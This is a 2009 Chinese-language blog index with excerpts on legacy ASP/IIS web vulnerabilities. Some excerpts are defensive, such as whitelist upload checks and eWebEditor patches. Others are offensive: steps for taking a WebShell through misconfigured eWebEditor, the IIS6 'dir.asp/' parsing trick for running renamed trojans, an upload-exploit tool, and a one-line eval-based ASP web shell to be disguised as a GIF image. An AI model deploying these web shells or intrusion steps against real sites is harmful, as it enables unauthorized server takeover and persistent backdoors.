浏览模式: 普通 | 列表
9月, 2009 | 1 | 2 | 3 | 4 | >
p.s. 如果重新安装iis,那么重新注册下asp.net

C:\WINdows\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe -i
或是
C:\WINdows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe -i

具体表现是:
1.所有应用程序池自动关闭,重启IIS,重装IIS问题依旧。
2.事件查看器里有相关“应用程序”日志记录。
3.IIS里的“网站”文件夹里的ISAPI筛选里可以看到"ASP.NET_2.0.50727.0"前有一个红色的向下的箭头
4.如果删除第三条里的那个筛选,再运行iisreset重启IIS,会发现网站都正常了,(除了那些用这个2.0的站点吧)
5.C盘加users权限,不用删除那个筛选,重启IIS,成功(这样太不安全了)
...

阅读全文…

chr(0)文件上传漏洞原理

[ 2009-09-26 17:30:36 | 作者: admin ]
p.s. 该上传漏洞相当普遍,解决也很简单,程序提取上传的文件后缀,加以白名单判断(勿使用黑名单),然后系统自动生成 随机文件名+后缀 即可解决。

我们在用 ASP 开发文件上传功能的时候,为了防止用户上传木马程序,常常会限制一些文件的上传,常用的方法是判断一下上传文件的扩展名是否符合规定,可以用 right 字符串函数取出上传文件的文件名的后四位,这样很容易就能判断了,但是这里面有一个漏洞,非常危险,就是 chr(0) 漏洞,详情请接着往下看。

一、首先解释下什么是 chr(0)?

在 ASP 中可以用 chr() 函数调用 ASCII 码,其中 chr(0) 表示调用的是一个结束字符,简单的说当一个字符串中包含 chr(0) 字符时,只能输出 chr(0) 前面的字符,chr(0) 后面的字符将不被输出。举例如说明:

<%response.write ...

阅读全文…
p.s. 木马文件 mu.asp 改成 mu.jpg
在网站建立一个 tao123.asp 目录,将mu.jpg放里面,mu.jpg可以运行

IIS6.0 文件名解析漏洞 终极解决办法!
(银月原创,转载请链接 http://silmoon.com/blog/blogview.asp?logID=143,谢谢)
我之前就发现这个漏洞,我也无奈,后来我想到了rewrite这个东西,它可以用正则表达式匹配URL进行处理。

http://test.com/dir.asp/diy.jpg
比如这就是个diy.asp被更改成图片的文件
IIS6.0的漏洞可以运行它。

我的解决办法:
我在
http://test.com/
下弄了个图片,上面写的警告信息
http://test.com/no.jpg

我在IIS6.0中安装了Rewrite这个ISAPI
下载ISAPIrewrite破解版 点击下载此文件
...

阅读全文…
http://hi.baidu.com/xinwg126/blog/item/998b0f186d9b680134fa4103.html

今天用了以下eWebEditor,根据网上一篇文章改了一下.因为怕被黑啊,网上都有eWebEditor漏洞的攻击方法,所以得改改,怕怕!

第一步:下载eWebEditor2.8 修正版

下载地址http://ewebeditor.webasp.net/download.asp
解压放到项目文件目录下. 为了方便使用我把文件改名为ewebeditor

第二步:修改相关调用到编辑器的ASP文件

<iframe ID="Editor" src="ewebeditor/ewebeditor.asp?Id=NewsContent&style=s_newssystem" frameborder="0" scrolling="no" width="100%" HEIGHT="100%"></iframe>
...

阅读全文…

eWebEditor的利用

[ 2009-09-26 10:26:58 | 作者: admin ]
站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!

漏洞利用
利用eWebEditor获得WebShell的步骤大致如下:
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1’ src=’/edit/...

阅读全文…

ewebeditor上传任意文件漏洞利用工具

[ 2009-09-26 10:14:00 | 作者: admin ]
注意有些版本没有此漏洞,具体什么版本号,我没有测试,大家在利用前先确定版本号,以确认有漏洞,要不然下面的文章会测试不成功!

http://www.qhwins.com/ShowNews/?11-20095317001981643.html

        作者的思路很妙,利用UNION语句,将执行结果调出来,然后加入自定义的文件后辍名,真是好办法,这种方法除了在这里可以用到,我想在以后的入侵过种中还会发挥很大的作用,作者说用NC抓包提交就可以做到上传木马,但是那个东东修改数据包,修改发送字节数之类的很麻烦,稍不留心就会失败,服务器返回提交参数错误之类的信息,看了很不爽,我用NC试了两次都没成功,一不做,二不休,我干脆做成一个HTML的,方便使用,直接给出代码如下:

        <HTML>
<HEAD>
<TITLE>文件上传</TITLE>
<meta http-equiv="Content-Type" ...

阅读全文…

ewebeditor漏洞解決方法

[ 2009-09-26 09:56:35 | 作者: admin ]
1,修改admin的密碼.

2,upload.asp中的
' 任何情況下都不允許上傳asp腳本文件
sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
改為:
' 任何情況下都不允許上傳asp腳本文件
sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
sAllowExt = Replace(UCase(sAllowExt), "ASA", "")
sAllowExt = Replace(UCase(sAllowExt), "CER", "")
sAllowExt = Replace(UCase(sAllowExt), "AASPSP", "")
sAllowExt = Replace(UCase(sAllowExt), "CDX", "")
sAllowExt = Replace(UCase(sAllowExt), "HTR", "")
...

阅读全文…

asp图片木马

[ 2009-09-26 08:36:16 | 作者: admin ]
作者:红魂浩天
一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马。

        asp木马已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子asp
后门还是我众马中的首选,现在我们就把它作成图片asp木马。

首先我们把冰狐浪子asp木马服务端直接该后缀名为gif,记得用容错格式:

<SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>

一、include给我们指路

接下来要使用include指令,这个指令也是我们常常看到的,但是它有一个很特别的功能,可能你就没有用到过了。这就是可以调用位于其它文件中的函数,不管它的后缀名是什么,哪怕是个图片文件。
...

阅读全文…